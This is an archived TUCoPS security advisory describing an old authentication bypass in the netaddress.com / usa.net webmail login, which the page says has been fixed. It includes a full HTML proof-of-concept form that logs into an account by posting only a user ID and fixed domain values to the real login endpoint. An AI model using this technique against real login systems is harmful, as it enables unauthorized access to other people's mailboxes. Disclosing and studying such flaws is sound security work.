Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Specific Sites :: usanet.htm

Netaddress.com mailing service login form exploit



COMMAND

    netaddress.com mailing service

SYSTEMS AFFECTED

    Netaddress

PROBLEM

    Syed Mohamed found following.  While submitting the login form  to
    /tpl/Door/Login  it  needs  just  only  three  parameters  maidid,
    domainid(value=4),  domain(value=usa.net).   Create  a  html  file
    which  contains  all  the  three  parameters.   Submit the form to
    http://netaddress.com//tpl/door/login.   Note  that  give   double
    slash  after  netaddress.com.   While  tried  with single slash it
    didn`t work.

    Here is the Exploit code (save  this as html and run it  in local.
    Submit only with userid).

    Exploit Code:

    <html>
    <form name="loginform"
                  action="http://classic.netaddress.com//tpl/Door/LoginPost"
    method="POST" target=_blank>
    <input type="hidden" name="LoginState" value="2">
    
                <input type="hidden" name="DomainID" value="4">
                 <input type="hidden" name="Domain" value="usa.net">
    
    
    <b><font color="#FF0000" size="2" face="Arial">Netaddress Security hole -
    Demo</font></b><font face="Arial" size="2"><br>
    <br>
    Developed By Syed Mohamed (<a href="mailto:syedblr@hotmail.com">syedblr@hotmail.com</a>)<br>
    <br>
    Just Enter Login ID (enter example if netaddress id is example@usa.net)</font>
    <p>
    
    
    <input type="text" size="16" name="UserID" value="">
    <input type="submit" value="Login">
    </form>
    </p>
    </html>

SOLUTION

    USA.NET's technical  and security  teams have  been made  aware of
    this issue and it has been corrected.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH